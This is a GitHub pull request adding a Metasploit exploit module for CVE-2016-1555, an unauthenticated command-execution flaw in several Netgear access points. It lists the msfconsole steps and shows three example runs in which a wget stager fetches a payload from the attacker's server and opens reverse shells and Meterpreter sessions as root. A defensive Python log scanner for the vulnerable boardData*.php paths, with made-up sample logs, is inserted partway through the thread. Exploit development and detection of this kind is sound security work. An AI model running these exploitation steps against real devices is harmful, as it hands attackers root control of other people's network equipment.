Module for CVE-2016-1555 vulnerability #10768

Open
wants to merge 12 commits into
base: master
from


Psi0NYX commented Oct 8, 2018

Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

  • WN604 before 3.3.3
  • WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

There are 5 possible vulnerable URIs (boardData102.php, boardData103.php, boardDataNA.php, boardDataJP.php and boardDataWW.php). boardDataWW.php will most likely be present in all vulnerable firmwares (WW for worldwide). The module "checks" for unauthenticated arbitrary command execution in the POST request sent to boardDataWW.php.

Tested on: Netgear WNAP320 firmware 2.0.3 and WN604 firmware 3.3.2, emulated with QEMU, set up by FIRMADYNE.

Verification

  • run msfconsole
  • use exploit/linux/http/netgear_unauth_exec,
  • set RHOST <target_ip>
  • set LHOST <your_ip>
  • set SRVHOST <your_ip> if you aren't hosting your payload on some other server
  • set TARGETURI boardData1xx.php or set TARGETURI boardDataXX.php if you want to pwn the other URIs. Default boardDataWW.php should work fine.
  • Default payload is linux/mipsbe/shell_reverse_tcp. Set to linux/mipsbe/meterpreter/reverse_tcp to get Meterpreter session.
  • exploit for profit.
  • No vulnerable URI means that it automatically fails, for both exploit and check:
  • Basic documentation can be found at the documentation/modules/exploit/linux/http/netgear_unauth_exec.md file

Example Output with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

Example Output with meterpreter

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

Example Output using some other vulnerable URI (boardDataNA.php)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

TODO LIST

  • Check for firmware version using a non-aggressive method. Firmware version can be found in getBoardConfig.php, which can (probably) be accessed without authorization. (EDIT: NB: requires hardware)
  • Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created. (EDIT: CmdStager makes this redundant)
  • When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always boardDataWW.php. (EDIT: out of scope of the exploit module, would be a good idea for an auxiliary module though)
  • Test the module against the latest vulnerable firmware versions (WN604 firmware < 3.3.3 and WNAP320 firmware < 3.5.5.0). EDIT: Successful versus WN604 firmware 3.3.2, WNAP320 firmware 3.0.5.0 could not be emulated.
  • Update docs.
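A defender-side complement to the module described above: an added example (not part of this PR or of the Metasploit project) that scans web-server or proxy access logs for requests to the five boardData*.php paths the PR lists, flagging POSTs to them as CVE-2016-1555 exploitation attempts and GETs as probes for a vulnerable URI. The combined log format and the sample lines are constructed for the example.

```python
import re
from collections import namedtuple

# The five request paths the PR lists as potentially vulnerable (CVE-2016-1555).
VULNERABLE_PATHS = {
    "/boardData102.php", "/boardData103.php", "/boardDataNA.php",
    "/boardDataJP.php", "/boardDataWW.php",
}

# Combined log format (assumed): client, timestamp, "METHOD PATH PROTO", status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

Finding = namedtuple("Finding", "client ts path status reason")


def scan_line(line):
    """Return a Finding if the line touches a boardData*.php path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    if path not in VULNERABLE_PATHS:
        return None
    if m.group("method") == "POST":
        reason = "unauthenticated POST to boardData*.php (CVE-2016-1555 exploitation attempt)"
    else:
        reason = "probe for presence of a boardData*.php URI"
    return Finding(m.group("client"), m.group("ts"), path, int(m.group("status")), reason)


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample log lines (not taken from the PR).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Oct/2018:20:24:50 +0630] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Oct/2018:20:24:51 +0630] "GET /boardDataWW.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Oct/2018:20:24:52 +0630] "POST /boardDataWW.php HTTP/1.1" 200 1024 "-" "python-requests/2.19"
10.0.0.5 - - [09/Oct/2018:20:24:53 +0630] "POST /boardDataNA.php HTTP/1.1" 404 0 "-" "python-requests/2.19"
10.0.0.7 - - [09/Oct/2018:20:25:00 +0630] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.client} {f.path} status={f.status}: {f.reason}")
```

A 404 on one of these paths still counts as an attempt: as the PR notes, the module simply fails when the URI is absent, so the request itself is the signal to alert on.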

Psi0NYX added some commits Oct 8, 2018

Added module for CVE-2016-1555 (netgear_unauth_exec)
and its corresponding wordlist file (netgear_boardData_paths.txt).
Added documentation for
modules/exploit/linux/http/netgear_unauth_exec.rb
@bcoles

Is there a reason a custom HTTP stager is used, rather than the built-in curl/wget stagers?


Psi0NYX added some commits Oct 8, 2018

Fixed numbering in the documentation steps, offed some whitespace,
streamlined the send_request_cgi, removed the conn_check.

Psi0NYX added some commits Oct 8, 2018

Used a command stager, improved upon vulnerability detection and
generally attempted to streamline most of the code. Hardcoded one
vulnerable URI since it's the most likely to be present in all versions
of the vulnerable firmwares.

Psi0NYX added some commits Oct 9, 2018
